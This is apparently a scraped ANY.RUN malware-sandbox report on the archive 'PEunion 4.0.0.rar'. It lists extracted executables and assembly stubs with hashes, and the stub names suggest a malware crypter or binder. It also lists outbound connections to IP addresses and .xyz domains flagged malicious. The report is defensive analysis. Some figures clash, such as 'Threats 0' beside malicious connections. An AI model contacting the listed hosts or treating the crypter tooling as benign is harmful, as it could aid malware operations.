2C0000000000000001000000FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF42000000420000000204000037020000
(PID) Process:(2712) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\General
Operation:writeName:LastFolder
Value:
C:\Users\admin\Desktop
Executable files
48
Suspicious files
34
Text files
204
Unknown types
4

Dropped files

PID
Process
Filename
Type
2712WinRAR.exeC:\Users\admin\Desktop\PEunion 4.0.0\PEunion 4.0.0\PEunion 4.0.0.exeexecutable
MD5:6EB37F6DABD26EC22927CE0A64B88292
SHA256:C071A2C670D9012AF38A08C70D67C5DC78C7A47E95294F5FF7789A95EB9FA202
2640WinRAR.exeC:\Users\admin\Desktop\PEunion 4.0.0\PEunion 4.0.0\Help\Template.htmlhtml
MD5:8FE760D50E2F356019E8D6E642C075F5
SHA256:9100ED17ED1EE00F5306B48B11AF760AD53F7BCB7D1E76240146BAF20211A381
2640WinRAR.exeC:\Users\admin\Desktop\PEunion 4.0.0\PEunion 4.0.0\Stub\pe32\Compression.asmtext
MD5:FEB8D2DE1663ADC1E141B8F7BB95D6AC
SHA256:AC2ADD960F9B626020137271676A37D6185B05C55000D2F0858F7E788E0AB37B
2640WinRAR.exeC:\Users\admin\Desktop\PEunion 4.0.0\PEunion 4.0.0\Stub\pe32\Drop.asmtext
MD5:79CCD53FE0C83491CB4A34B3671E1520
SHA256:B963211F410C26449E4CB2284C08D09FE88C4003C7B37AC72B2519A588564CD7
2640WinRAR.exeC:\Users\admin\Desktop\PEunion 4.0.0\PEunion 4.0.0\Stub\pe32\Obfuscator\register.txttext
MD5:E9F329A48DCB70C6AD95C8AB8FE82EB0
SHA256:5DD46720271713BDEF9EDAFE9058DBEE1A10003DEA7CAC4CB5CDB53D68A3A637
2640WinRAR.exeC:\Users\admin\Desktop\PEunion 4.0.0\PEunion 4.0.0\Stub\pe32\Stub.asmtext
MD5:A54153CD522D951F6B360C3BD3DE84D0
SHA256:195E94C80F787FA5E24168C46FE392D2710E9C6E4B25B31ED73201C3D2BC93FA
2640WinRAR.exeC:\Users\admin\Desktop\PEunion 4.0.0\PEunion 4.0.0\Stub\pe32\Stage2.asmtext
MD5:E03EAF459F028CC6FA8669E277C1A17A
SHA256:A32A88946334B5F32FE890FCB104B090DD38CB32EF7948F5B8382BCC2D8DA61F
2640WinRAR.exeC:\Users\admin\Desktop\PEunion 4.0.0\PEunion 4.0.0\Stub\pe32\Obfuscator\nop.txttext
MD5:F7BBCDD86CBC1D6D0B81720AC1477FDE
SHA256:50F8CECBFC4491BB320692EFBC0003B045760683BB63913FD42152DAFC0C922F
2640WinRAR.exeC:\Users\admin\Desktop\PEunion 4.0.0\PEunion 4.0.0\Prunion.exeexecutable
MD5:E32938F0B819FE181AC2D00ABBFFA427
SHA256:2347D8878EEE09EF19B9B49A36A3F93E1A5526A621D29C3695A2D4ED671CD3CC
2640WinRAR.exeC:\Users\admin\Desktop\PEunion 4.0.0\PEunion 4.0.0\Stub\pe32\Melt.asmtext
MD5:78F905EA7378410C450C79CEB3B9012B
SHA256:50156675295081D268576F77201B4F78BB466446E18CA4AF410833F16DE7646A
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
5
DNS requests
6
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
256552
AppLaunch.exe
79.137.192.9:19788
Partner LLC
RU
malicious
53460
AppLaunch.exe
94.140.112.105:81
litrazalilibe.xyz
Sia Nano IT
LV
malicious
111252
AppLaunch.exe
193.106.191.16:28958
Kanzas LLC
RU
malicious
258880
AppLaunch.exe
193.106.191.18:37572
Kanzas LLC
RU
malicious
104064
AppLaunch.exe
62.204.41.141:24758
Horizon LLC
RU
malicious

DNS requests

Domain
IP
Reputation
boardparty.xyz
malicious
litrazalilibe.xyz
  • 94.140.112.105
malicious

Threats

No threats detected
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
PEunion 4.0.0.rar